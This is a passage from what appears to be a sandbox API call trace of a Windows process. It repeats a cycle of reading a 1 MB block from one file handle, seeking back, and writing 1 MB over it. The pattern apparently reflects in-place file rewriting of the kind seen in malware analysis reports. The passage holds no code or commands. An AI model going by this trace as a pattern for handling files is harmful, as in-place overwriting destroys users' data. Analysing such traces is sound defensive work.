1 [0072.105] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.107] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.132] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.132] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.135] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.145] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.145] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.148] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.173] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.173] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.176] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.186] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.186] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.188] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.213] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.213] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.215] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.225] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.225] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.228] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.252] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.252] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.255] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.265] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.265] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.268] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.293] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.293] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.296] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.306] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.306] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.309] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.334] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.334] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.336] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.347] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.347] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.350] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.376] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.376] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.379] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.390] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.390] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.392] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.417] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.417] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.420] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.431] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.431] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.433] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.458] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.458] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.539] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.746] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.746] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.748] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.774] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.774] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.777] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.793] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.793] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.796] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.824] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.824] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.827] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.839] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.839] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.842] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.868] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.868] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.871] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.882] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.882] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.885] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.912] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.912] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.915] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.925] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.925] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.928] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.954] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.954] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.956] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.967] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.967] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.970] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0072.997] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.997] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0072.999] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.010] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.010] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.013] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.041] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.041] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.044] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.056] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.056] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.059] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.087] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.087] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.089] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.101] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.101] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.104] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.132] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.132] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.134] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.146] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.146] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0073.149] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0073.182] SetFilePointerEx (in: hFile=0x430, 